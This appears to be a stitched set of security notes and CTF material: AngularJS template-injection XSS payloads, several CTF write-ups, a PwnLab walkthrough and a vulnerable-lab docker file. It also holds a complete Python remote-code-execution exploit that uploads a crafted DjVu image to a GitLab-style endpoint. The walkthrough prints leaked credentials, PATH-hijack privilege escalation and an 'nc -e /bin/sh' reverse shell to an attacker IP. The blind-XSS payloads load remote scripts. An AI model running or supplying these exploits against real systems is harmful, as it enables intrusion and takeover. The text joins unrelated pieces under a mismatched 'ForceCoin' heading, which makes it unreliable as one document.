{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}} ``` AngularJS 1.2.0 - 1.2.1 ```javascript {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}} ``` AngularJS 1.0.1 - 1.1.5 and Vue JS ```javascript {{constructor.constructor('alert(1)')()}} ``` ### Advanced bypassing XSS AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter.com/VirenPawar_) ```javascript {{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}} ``` AngularJS (without `'` single and `"` double quotes and `constructor` string) ```javascript {{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} ``` ```javascript {{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} ``` ```javascript {{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} ``` ```javascript {{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} ``` AngularJS bypass Waf [Imperva] ```javascript {{x=['constr', 'uctor'];a=x.join('');b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'pr\\u{6f}mpt(d\\u{6f}cument.d\\u{6f}main)')()}} ``` ### Blind XSS 1.0.1 - 1.1.5 && > 1.6.0 by Mario Heiderich (Cure53) ```javascript {{ constructor.constructor("var _ = document.createElement('script'); _.src='//localhost/m'; document.getElementsByTagName('body')[0].appendChild(_)")() }} ``` Shorter 1.0.1 - 1.1.5 && > 1.6.0 by Lewis Ardern (Synopsys) and Gareth Heyes (PortSwigger) ```javascript {{ $on.constructor("var _ = document.createElement('script'); _.src='//localhost/m'; document.getElementsByTagName('body')[0].appendChild(_)")() }} ``` 1.2.0 - 1.2.5 by Gareth Heyes (PortSwigger) ```javascript {{ a="a"["constructor"].prototype;a.charAt=a.trim; $eval('a",eval(`var _=document\\x2ecreateElement(\'script\'); _\\x2esrc=\'//localhost/m\'; document\\x2ebody\\x2eappendChild(_);`),"') }} ``` 1.2.6 - 1.2.18 by Jan Horn (Cure53, now works at Google Project Zero) ```javascript {{ (_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'eval(" var _ = document.createElement(\'script\'); _.src=\'//localhost/m\'; document.getElementsByTagName(\'body\')[0].appendChild(_)")')() }} ``` 1.2.19 (FireFox) by Mathias Karlsson ```javascript {{ toString.constructor.prototype.toString=toString.constructor.prototype.call; ["a",'eval("var _ = document.createElement(\'script\'); _.src=\'//localhost/m\'; document.getElementsByTagName(\'body\')[0].appendChild(_)")'].sort(toString.constructor); }} ``` 1.2.20 - 1.2.29 by Gareth Heyes (PortSwigger) ```javascript {{ a="a"["constructor"].prototype;a.charAt=a.trim; $eval('a",eval(` var _=document\\x2ecreateElement(\'script\'); _\\x2esrc=\'//localhost/m\'; document\\x2ebody\\x2eappendChild(_);`),"') }} ``` 1.3.0 - 1.3.9 by Gareth Heyes (PortSwigger) ```javascript {{ a=toString().constructor.prototype;a.charAt=a.trim; $eval('a,eval(` var _=document\\x2ecreateElement(\'script\'); _\\x2esrc=\'//localhost/m\'; document\\x2ebody\\x2eappendChild(_);`),a') }} ``` 1.4.0 - 1.5.8 by Gareth Heyes (PortSwigger) ```javascript {{ a=toString().constructor.prototype;a.charAt=a.trim; $eval('a,eval(`var _=document.createElement(\'script\'); _.src=\'//localhost/m\';document.body.appendChild(_);`),a') }} ``` 1.5.9 - 1.5.11 by Jan Horn (Cure53, now works at Google Project Zero) ```javascript {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply;c.$apply=$apply; c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?void0:(window.X=true,eval(`var _=document.createElement(\\'script\\');_.src=\\'//localhost/m\\';document.body.appendChild(_);`)))+';astNode.argument={type:'Identifier',name:'foo'};"); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }} ``` ## Automatic Sanitization > To systematically block XSS bugs, Angular treats all values as untrusted by default. When a value is inserted into the DOM from a template, via property, attribute, style, class binding, or interpolation, Angular sanitizes and escapes untrusted values. However, it is possible to mark a value as trusted and prevent the automatic sanitization with these methods: - bypassSecurityTrustHtml - bypassSecurityTrustScript - bypassSecurityTrustStyle - bypassSecurityTrustUrl - bypassSecurityTrustResourceUrl Example of a component using the unsecure method `bypassSecurityTrustUrl`: ``` import { Component, OnInit } from '@angular/core'; @Component({ selector: 'my-app', template: ` <h4>An untrusted URL:</h4> <p><a class="e2e-dangerous-url" [href]="dangerousUrl">Click me</a></p> <h4>A trusted URL:</h4> <p><a class="e2e-trusted-url" [href]="trustedUrl">Click me</a></p> `, }) export class App { constructor(private sanitizer: DomSanitizer) { this.dangerousUrl = 'javascript:alert("Hi there")'; this.trustedUrl = sanitizer.bypassSecurityTrustUrl(this.dangerousUrl); } } ``` When doing a code review, you want to make sure that no user input is being trusted since it will introduce a security vulnerability in the application. ## References - [XSS without HTML - CSTI with Angular JS - Portswigger](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs) - [Blind XSS AngularJS Payloads](https://ardern.io/2018/12/07/angularjs-bxss) - [Angular Security](https://angular.io/guide/security) - [Bypass DomSanitizer](https://medium.com/@swarnakishore/angular-safe-pipe-implementation-to-bypass-domsanitizer-stripping-out-content-c1bf0f1cc36b)
sec-knowleage
# CAN opener, CAN, 150pts > Our operatives have recovered a DeLorean in the ruins of an old mid-west US town. It appears to be locked, but we have successfully accessed its internal communications channels. According to the little data we have, the DeLorean internally uses an archaic technology called CAN bus. We need you to analyze the communications and find a way to unlock the vehicle; once unlocked, recover the secret flag stored inside. We have reason to believe that vehicle entry should be a fairly easy challenge, but to aid you in this, we have restored and reconnected the vehicle dashboard. > Best of luck. > The Dashboard app is available here. > Challenge developed by Argus Cyber Security. This was first of the challenges related to CAN bus. The board we got has two CAN controllers, connected to each other, allowing the AVR chip to talk to itself (in a loopback mode, so to say). Apparently it was sending messages through one interface to the other, to simulate full, car-wide CAN bus. Connecting logic analyzer to the CAN bus we could sniff the sent messages. One of those was particularly interesting - `lock\x00\x00\x00\x00`. We could only think that the opposite of it would be `unlock\x00\x00`... At this point of time, I had no CAN hardware, but I had... Arduino. So I wrote a software implementation of CAN bus: https://gist.github.com/akrasuski1/b1904966c4de0b50672e6fc1fd116d3e It's not very efficient, does absolutely no error-checking, and the code quality is quite poor, but it was enough to send the unlock message. After the board received it, it sent the flag through UART interface to the dashboard.
sec-knowleage
version: '2' services: web: image: vulhub/phpmyadmin:4.8.1 volumes: - ./config.inc.php:/var/www/html/config.inc.php ports: - "8080:80" depends_on: - mysql mysql: image: mysql:5.5 environment: - MYSQL_RANDOM_ROOT_PASSWORD=yes - MYSQL_DATABASE=test - MYSQL_USER=test - MYSQL_PASSWORD=test
sec-knowleage
# Postbook - FLAG2 ## 0x00 New Post ![](./imgs/new_post.jpg) There is a hidden value shows **user_id = 2**. Change it to 1 which may post as other people. ![](./imgs/test_post.jpg) ## 0x01 FLAG ![](./imgs/flag.jpg)
sec-knowleage
# PwnLab:init 下载地址: ``` https://download.vulnhub.com/pwnlab/pwnlab_init.ova ``` ## 实战操作 靶场IP地址:`192.168.0.27`。 扫描靶场端口信息 ``` ┌──(root💀kali)-[~/Desktop] └─# nmap -sV -p1-65535 192.168.0.27 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 08:15 EST Nmap scan report for 192.168.0.27 Host is up (0.0026s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 3306/tcp open mysql MySQL 5.5.47-0+deb8u1 41133/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:E5:CA:92 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.47 seconds ``` 扫描80WEB端口服务。 ``` ┌──(root💀kali)-[~/Desktop] └─# nikto -h http://192.168.0.27/ - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.0.27 + Target Hostname: 192.168.0.27 + Target Port: 80 + Start Time: 2021-12-30 08:17:26 (GMT-5) --------------------------------------------------------------------------- + Server: Apache/2.4.10 (Debian) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1". + Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Cookie PHPSESSID created without the httponly flag + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /config.php: PHP Config file may contain database IDs and passwords. + OSVDB-3268: /images/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + /login.php: Admin login page/section found. + 7915 requests: 0 error(s) and 11 item(s) reported on remote host + End Time: 2021-12-30 08:18:16 (GMT-5) (50 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` 访问80端口WEB服务,点击upload功能提示需要登录。 ![](<../../.gitbook/assets/image (18) (1) (1).png>) 尝试使用SQL注入是测试,发现不可以。 ![](<../../.gitbook/assets/image (23) (1) (1) (1) (1) (1) (1).png>) 然后注意到像这种URL:http://192.168.0.27/?page=login,很大程度存在**本地文件包含漏洞**。nikto扫描到`config.php`文件,直接文件包含`config.php`。 ``` http://192.168.0.27/?page=php://filter/convert.base64-encode/resource=config ``` ![](<../../.gitbook/assets/image (24) (1) (1) (1) (1) (1) (1).png>) base64解密 ``` ┌──(root💀kali)-[~/Desktop] └─# echo PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+ | base64 -d <?php $server = "localhost"; $username = "root"; $password = "H4u%QJ_H99"; $database = "Users"; ?> ``` MySQL连接上去,发现用户名密码(base64加密)。 ``` ┌──(root💀kali)-[~/Desktop] └─# mysql -uroot -pH4u%QJ_H99 -h192.168.0.27 1 ⨯ Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 54 Server version: 5.5.47-0+deb8u1 (Debian) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | Users | +--------------------+ 2 rows in set (0.001 sec) MySQL [(none)]> use Users; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MySQL [Users]> show tables; +-----------------+ | Tables_in_Users | +-----------------+ | users | +-----------------+ 1 row in set (0.001 sec) MySQL [Users]> select * from users; +------+------------------+ | user | pass | +------+------------------+ | kent | Sld6WHVCSkpOeQ== | | mike | U0lmZHNURW42SQ== | | kane | aVN2NVltMkdSbw== | +------+------------------+ 3 rows in set (0.000 sec) ``` 解密用户密码。 ``` ┌──(root💀kali)-[~/Desktop] └─# echo Sld6WHVCSkpOeQ== | base64 -d JWzXuBJJNy ┌──(root💀kali)-[~/Desktop] └─# echo U0lmZHNURW42SQ== | base64 -d SIfdsTEn6I ┌──(root💀kali)-[~/Desktop] └─# echo aVN2NVltMkdSbw== | base64 -d iSv5Ym2GRo ``` 上传反弹shell,提示只允许图片文件上传。 ![](<../../.gitbook/assets/image (14) (1) (1) (1) (1).png>) 修改上传后缀,报错ERROR 001。 ![](<../../.gitbook/assets/image (2).png>) 修改上传类型,报错ERROR 002。 ![](<../../.gitbook/assets/image (17) (1) (1) (1).png>) 修改上传类型以及添加图片头。 ![](<../../.gitbook/assets/image (15) (1) (1) (1) (1) (1).png>) 尝试本地文件包含图片木马,但是失败。 `http://192.168.0.27/?page=php://filter/read=convert.base64-encode/resource=upload/450619c0f9b99fca3f46d28787bc55c5.gif` ![](<../../.gitbook/assets/image (6) (1).png>) 本地包含`index.php`文件。 ![](<../../.gitbook/assets/image (24) (1) (1) (1) (1) (1).png>) 可以发现index.php源码里面有个cookie的`lang`参数,存在文件包含漏洞。 ``` ┌──(root💀kali)-[~] └─# echo PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4= | base64 -d <?php //Multilingual. Not implemented yet. //setcookie("lang","en.lang.php"); if (isset($_COOKIE['lang'])) { include("lang/".$_COOKIE['lang']); } // Not implemented yet. ?> <html> <head> <title>PwnLab Intranet Image Hosting</title> </head> <body> <center> <img src="images/pwnlab.png"><br /> [ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ] <hr/><br/> <?php if (isset($_GET['page'])) { include($_GET['page'].".php"); } else { echo "Use this server to upload and share image files inside the intranet"; } ?> </center> </body> </html> ``` lang参数文件包含到Linux密码文件。 ![](<../../.gitbook/assets/image (25) (1) (1) (1) (1) (1) (1) (1).png>) 本地文件包含图片木马,nc反弹。 ![](<../../.gitbook/assets/image (11) (1) (1).png>) 使用bash终端,方便显示。 ``` $ python -c 'import pty; pty.spawn("/bin/bash")' www-data@pwnlab:/$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` 查看home目录发现之前MySQL的几个用户。 ``` www-data@pwnlab:/$ ls ls bin dev home lib media opt root sbin sys usr vmlinuz boot etc initrd.img lost+found mnt proc run srv tmp var www-data@pwnlab:/$ cd /home cd /home www-data@pwnlab:/home$ ls ls john kane kent mike ``` 使用上面kane密码进行提权,找到`msgmike`一个二进制文件。 ``` kent@pwnlab:~$ su kane su kane Password: iSv5Ym2GRo kane@pwnlab:/home/kent$ cd /home/kane kane@pwnlab:~$ ls msgmike kane@pwnlab:~$ file msgmike msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped ``` 可以看到`msgmike`尝试查看`mike`目录`msg.txt`。 ``` kane@pwnlab:~$ ./msgmike cat: /home/mike/msg.txt: No such file or directory kane@pwnlab:~$ string msgmike bash: string: command not found kane@pwnlab:~$ strings msgmike strings msgmike /lib/ld-linux.so.2 libc.so.6 _IO_stdin_used setregid setreuid system __libc_start_main __gmon_start__ GLIBC_2.0 PTRh QVh[ [^_] cat /home/mike/msg.txt ;*2$"( GCC: (Debian 4.9.2-10) 4.9.2 GCC: (Debian 4.8.4-1) 4.8.4 ``` ![](<../../.gitbook/assets/image (27) (1) (1) (1) (1) (1) (1).png>) 猜测msgmike源代码 ``` int main() { system("cat /home/mike/msg.txt"); } ``` 查看环境变量,因为为该组设置了 SUID 位,正如您所看到的,Mike 在`mike`和`kane`组中。 ``` kane@pwnlab:~$ cd /tmp kane@pwnlab:/tmp$ echo $PATH /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games kane@pwnlab:/tmp$ echo '/bin/bash' >> cat kane@pwnlab:/tmp$ chmod +x /tmp/cat kane@pwnlab:/tmp$ export PATH=/tmp:$PATH kane@pwnlab:/tmp$ ~/msgmike mike@pwnlab:/tmp$ whoami mike ``` 查看mike目录`msg2root`文件。 ![](<../../.gitbook/assets/image (14) (1) (1) (1).png>) 猜测msg2root源代码 ``` #include <iostream> char msg[1024]; //Let's assume no BO takes place, alrighty? char command[1024]; int main() { printf("Message for root: "); scanf("%s", msg); snprintf(command, sizeof(command), "/bin/echo %s >> /root/messages.txt", msg); system(command); } ``` 直接nc反弹,虽然可以root,但是最后查不到flag.txt ![](<../../.gitbook/assets/image (24) (1) (1) (1) (1).png>) ``` hello; $(nc -e /bin/sh 192.168.0.8 11111) ``` ![image-20230208155711180](../../.gitbook/assets/image-20230208155711180.png)
sec-knowleage
import sys import re import requests target = sys.argv[1] command = sys.argv[2] session = requests.session() CSRF_PATTERN = re.compile(rb'csrf-token" content="(.*?)" />') def get_payload(command): rce_payload = b'\x41\x54\x26\x54\x46\x4f\x52\x4d' rce_payload += (len(command) + 0x55).to_bytes(length=4, byteorder='big', signed=True) rce_payload += b'\x44\x4a\x56\x55\x49\x4e\x46\x4f\x00\x00\x00\x0a\x00\x00\x00\x00\x18\x00\x2c\x01\x16\x01\x42\x47\x6a\x70\x00\x00\x00\x00\x41\x4e\x54\x61' rce_payload += (len(command) + 0x2f).to_bytes(length=4, byteorder='big', signed=True) rce_payload += b'\x28\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x09\x28\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x22\x5c\x0a\x22\x20\x2e\x20\x71\x78\x7b' rce_payload += command.encode() rce_payload += b'\x7d\x20\x2e\x20\x5c\x0a\x22\x20\x62\x20\x22\x29\x20\x29\x0a' return rce_payload def csrf_token(): response = session.get(f'{target}/users/sign_in', headers={'Origin': target}) g = CSRF_PATTERN.search(response.content) assert g, 'No CSRF Token found' return g.group(1).decode() def exploit(): files = [('file', ('test.jpg', get_payload(command), 'image/jpeg'))] session.post(f'{target}/uploads/user', files=files, headers={'X-CSRF-Token': csrf_token()}) if __name__ == '__main__': exploit() print('finish test')
sec-knowleage
#!/usr/bin/python3 s = [] p = 0 def init(): global s,p s = [i for i in range(0,64)] p = 0 return def randgen(): global s,p a = 3 b = 13 c = 37 s0 = s[p] p = (p + 1) & 63 s1 = s[p] res = (s0 + s1) & ((1<<64)-1) s1 ^= (s1 << a) & ((1<<64)-1) s[p] = (s1 ^ s0 ^ (s1 >> b) ^ (s0 >> c)) & ((1<<64)-1) return res def jump(to): # Deleted... return def check_jump(): init() jump(10000) assert randgen() == 7239098760540678124 init() jump(100000) assert randgen() == 17366362210940280642 init() jump(1000000) assert randgen() == 13353821705405689004 init() jump(10000000) assert randgen() == 1441702120537313559 init() for a in range(31337):randgen() for a in range(1234567):randgen() buf = randgen() for a in range(7890123):randgen() buf2 = randgen() init() jump(31337+1234567) print (buf == randgen()) jump(7890123) print (buf2 == randgen()) check_jump() init() for a in range(31337):randgen() flag = open("flag.txt").read() assert len(flag) == 256 enc = b"" for x in range(len(flag)): buf = randgen() sh = x//2 if sh > 64:sh = 64 mask = (1 << sh) - 1 buf &= mask jump(buf) enc += bytes([ ord(flag[x]) ^ (randgen() & 0xff) ]) print ("%r" % enc) open("enc.dat","wb").write(bytearray(enc))
sec-knowleage
# ForceCoin Category: PWN, 150 points ## Description > Following ARM's success, I went ahead and designed my own RISC assembly language. > > I wrote a simulator, so you'll be able to run your own programs and enjoy the (very) reduced instruction set! > > Of course, with such minimal implementation, reading the flag is impossible. An archive file was attached, containing the following files: ```console root@kali:/media/sf_CTFs/shabak/BabyRISC# tree BabyRISC BabyRISC ├── babyrisc ├── Dockerfile ├── inc │   ├── asm_execution.h │   ├── asm_file_generation.h │   ├── asm_file_parsing.h │   ├── asm_instructions.h │   ├── asm_processor_state.h │   ├── asm_types.h │   ├── common.h │   └── prompt.h ├── Makefile ├── payload_builder │   ├── build_payload.c │   └── Makefile ├── src │   ├── asm_execution.c │   ├── asm_file_generation.c │   ├── asm_file_parsing.c │   ├── asm_instructions.c │   ├── asm_processor_state.c │   ├── main.c │   └── prompt.c └── ynetd ``` We won't attach the complete sources since they are quite long. The following is a reduced version. ### main.c ```c #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include "prompt.h" #include "common.h" #include "asm_types.h" #include "asm_file_generation.h" #include "asm_execution.h" #define MAX_FLAG_SIZE (256) #define FLAG_FILE_PATH "flag" #define MAX_ADMIN_PAYLOAD_SIZE (1024) #define MAX_USER_PAYLOAD_SIZE (4096) #define TERMINATE_MARKER_UINT32 (0xfffffffful) static void disable_io_buffering(void) { // ... } // Reads the flag from the flag file into the buffer. // The flag is written null-terminated (and the rest of the buffer is padded with nulls). // Return 0 on success, otherwise - error. static int read_flag(char * buffer, size_t buffer_len) { // ... } // Writes the admin shellcode to the 'payload' buffer. // Writes the actual size of the payload to 'payload_size_out'. static int generate_admin_code(uint8_t * payload, size_t max_size, size_t * payload_size_out) { int ret = E_SUCCESS; char flag_string[MAX_FLAG_SIZE] = { 0 }; FILE * payload_fp = NULL; ret = read_flag(flag_string, sizeof(flag_string)); if (ret != E_SUCCESS) { printf("Failed to read flag.\n"); goto cleanup; } payload_fp = fmemopen(payload, max_size, "w"); if (payload_fp == NULL) { ret = E_FOPEN; goto cleanup; } // Write admin shellcode to payload buffer // (Because E_SUCCESS == 0, we just OR all the return values, to check for error when we finish). ret = E_SUCCESS; // Pad out with newlines for (size_t i = 0; i < 8; ++i) { ret |= file_write_opcode(payload_fp, PRINTNL); } // If the user sets R0 so (R0 * 42) == 1 (impossible!), she deserves to read the flag ret |= file_write_opcode_imm32(payload_fp, ADDI, ASM_REGISTER_R1, ASM_REGISTER_ZERO, 42); ret |= file_write_opcode3(payload_fp, MUL, ASM_REGISTER_R2, ASM_REGISTER_R0, ASM_REGISTER_R1); ret |= file_write_opcode_imm32(payload_fp, SUBI, ASM_REGISTER_R2, ASM_REGISTER_R2, 1); ret |= file_write_opcode1(payload_fp, RETNZ, ASM_REGISTER_R2); // Print each 4-bytes of the flag as 4-characters // (We might print some trailing null-characters if the flag length is not divisible by 4) int32_t * flag_start = (int32_t *)flag_string; int32_t * flag_end = (int32_t *)((char *)flag_string + strlen(flag_string)); for (int32_t * p = flag_start; p <= flag_end; ++p) { int32_t dword = *p; ret |= file_write_opcode_imm32(payload_fp, ADDI, ASM_REGISTER_R1, ASM_REGISTER_ZERO, dword); for (size_t j = 0; j < 4; j++) { ret |= file_write_opcode1(payload_fp, PRINTC, ASM_REGISTER_R1); ret |= file_write_opcode_imm32(payload_fp, ROR, ASM_REGISTER_R1, ASM_REGISTER_R1, 8); } } ret |= file_write_opcode(payload_fp, PRINTNL); ret |= file_write_opcode(payload_fp, RET); // Check if some error (other than E_SUCCESS) was recieved during the admin code generation if (ret != E_SUCCESS) { ret = E_ADMIN_CODE_ERR; goto cleanup; } // Success long offset = ftell(payload_fp); if (offset == -1) { ret = E_FTELL; goto cleanup; } *payload_size_out = (size_t)offset; cleanup: if (payload_fp != NULL) { fclose(payload_fp); } return ret; } // Read the user code from 'stdin'. The code must be terminated with 4 0xff bytes (0xffffffff). // The code maximum size is 'max_size'. static int read_user_code(uint8_t * payload, size_t max_size, size_t * payload_size_out) { // ... } int main(void) { int ret = E_SUCCESS; disable_io_buffering(); uint8_t admin_payload[MAX_ADMIN_PAYLOAD_SIZE] = { 0 }; size_t admin_payload_size = 0; uint8_t user_payload[MAX_USER_PAYLOAD_SIZE] = { 0 }; size_t user_payload_size = 0; uint8_t * combined_payload = NULL; size_t combined_payload_size = 0; ret = generate_admin_code(admin_payload, sizeof(admin_payload), &admin_payload_size); if (ret != E_SUCCESS) { printf("Failed to generate admin code\n"); goto cleanup; } ret = read_user_code(user_payload, sizeof(user_payload), &user_payload_size); if (ret != E_SUCCESS) { printf("Failed to read code from user (stdin).\n"); goto cleanup; } printf("User payload size: %ld\n", user_payload_size); // Combine the payloads combined_payload_size = user_payload_size + admin_payload_size; combined_payload = malloc(combined_payload_size); if (combined_payload == NULL) { ret = E_NOMEM; goto cleanup; } memcpy(combined_payload, user_payload, user_payload_size); memcpy(&combined_payload[user_payload_size], admin_payload, admin_payload_size); // Execute the code! PROMPT_PRINTF_COLOR(GRN, "Executing code!\n"); ret = execute_asm_memory(combined_payload, combined_payload_size); cleanup: return ret; } ``` ### asm_processor_state.h ```c #pragma once #ifndef __ASM_PROCESSOR_STATE_H #define __ASM_PROCESSOR_STATE_H #include "asm_types.h" #include "common.h" // Registers indices typedef enum asm_register_e { ASM_REGISTER_START, ASM_REGISTER_ZERO = ASM_REGISTER_START, ASM_REGISTER_R0, ASM_REGISTER_R1, ASM_REGISTER_R2, ASM_REGISTER_R3, ASM_REGISTER_R4, ASM_REGISTER_R5, ASM_REGISTER_R6, ASM_REGISTER_SP, ASM_REGISTER_END } asm_register_t; #define ASM_STACK_SIZE (4096) extern uint8_t asm_stack[ASM_STACK_SIZE]; extern reg_value_t registers[ASM_REGISTER_END - ASM_REGISTER_START]; void initialize_context(void); int read_reg(asm_register_t reg, reg_value_t * reg_out); int write_reg(asm_register_t reg, reg_value_t value); #endif /* __ASM_PROCESSOR_STATE_H */ ``` ### asm_processor_state.c ```c #include <string.h> #include "asm_processor_state.h" // The actual stack & registers of the processor uint8_t asm_stack[ASM_STACK_SIZE] = { 0 }; reg_value_t registers[ASM_REGISTER_END - ASM_REGISTER_START] = { 0 }; void initialize_context(void) { memset(registers, 0, sizeof(registers)); memset(asm_stack, 0, sizeof(asm_stack)); } int read_reg(asm_register_t reg, reg_value_t * reg_out) { if (reg < 0 || reg >= sizeof(registers) / sizeof(reg_value_t)) { return E_R_INVLD_REG; } *reg_out = registers[reg]; return E_SUCCESS; } int write_reg(asm_register_t reg, reg_value_t value) { if (reg < 0 || reg >= sizeof(registers) / sizeof(reg_value_t)) { return E_W_INVLD_REG; } else if (reg == ASM_REGISTER_ZERO) { return E_W2ZERO; } registers[reg] = value; return E_SUCCESS; } ``` ### asm_instructions.c ```c #include "asm_instructions.h" #include "asm_processor_state.h" #include "asm_file_parsing.h" #include "string.h" #define _rotl(x, r) (((x) << (r)) | ((x) >> (32 - (r)))) #define _rotr(x, r) (((x) >> (r)) | ((x) << (32 - (r)))) // The INSTRUCTION_DEFINE_BINARY_* macros below allow you to quickly define binary operations without // implementing any code yourself. Just pass the "operator" to be applied. // Define binary operation (which is: "reg0 = reg1 (op) reg2") // Here just pass the 'operator' as the (op) being made #define INSTRUCTION_DEFINE_BINARY_OP(opcode, operator) \ INSTRUCTION_DEFINE_OP3(opcode) \ { \ //... \ } // Define binary 32-bit immediate operation (which is: "reg0 = reg1 (op) imm32") // Here just pass the 'operator' as the (op) being made #define INSTRUCTION_DEFINE_BINARY_IMM32_OP(opcode, operator) \ INSTRUCTION_DEFINE_OP_IMM32(opcode) \ { \ //... \ } // Each of the INSTRUCTION_DEFINE_OP* macros below allow you to define new instructions. // The effect of using these macros is generating a new symbol "__INSTRUCTION_DEFINE_(opcode)", which contains // the implementation for the opcode itself. The code you will write after the invocation will be the // "__INSTRUCTION_IMPL_(opcode)" symbol, which gets as parameters the registers / immediate of the instruction. // Define instruction with no operands #define INSTRUCTION_DEFINE_OP0(opcode) \ //... \ // Define instruction with a single register operand #define INSTRUCTION_DEFINE_OP1(opcode) \ //... \ // Define instruction with two registers operand #define INSTRUCTION_DEFINE_OP2(opcode) \ //... \ // Define instruction with three registers operand #define INSTRUCTION_DEFINE_OP3(opcode) \ //... \ // Define instruction with two registers operands and a single 32-bit immediate #define INSTRUCTION_DEFINE_OP_IMM32(opcode) \ //... \ // Actually define all the binary operations INSTRUCTION_DEFINE_BINARY_OP(AND, &) 